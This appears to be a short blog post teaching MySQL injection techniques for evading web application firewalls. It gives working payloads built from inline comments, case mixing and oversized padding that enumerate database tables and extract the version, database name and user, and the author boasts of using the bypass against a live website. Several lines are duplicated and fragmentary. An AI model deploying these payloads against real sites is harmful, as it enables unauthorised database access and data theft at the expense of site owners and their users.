MySQL injection with Bypassing WAF:
Comments:
Comments:
SQL
comments are a blessing to us SQL injectors. They allow us to bypass a lot of
the restrictions of Web application firewalls and to kill certain SQL
statements to execute the attackers commands while commenting out the actual
legitimate query. Some comments in SQL:
//, — ,
/**/, #, –+, — -, ;
Case
Changing:
Some WAF’s filter key words like /union\select/ig We can bypass this
filter by using inline comments most of the time, More complex examples will
require more advanced approach like adding SQL keywords that will further
separate the two words:
id=1/*!UnIoN*/SeLeCT
Take
notice of the exclamation point /*!code*/ The exclamation point executes our
SQL statement.
Inline comments can be used throughout the SQL statement so if table_name or information_schema are filtered we can add more inline comments. For example:
Inline comments can be used throughout the SQL statement so if table_name or information_schema are filtered we can add more inline comments. For example:
id=1/*!UnIoN*/+SeLeCT+1,2,/*!table_name*/+FrOM
/*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/=database()– -
This
bypass above works. I myself just used this against a Web site recently.
Buffer
Overflow:/Unexpected input:
A lot of
WAFS are written in the C language making them prone to overflow or or act
differently when loaded with a bunch of data. Here is a WAF that does it’s job
correctly, but when given a large amount of Data allows the malicious request
and response.
id=1 and
(select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA 1000 more
A’s)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
,27,28,29,30,31,32,33,34,35,36–+
,27,28,29,30,31,32,33,34,35,36–+
0 comments:
Post a Comment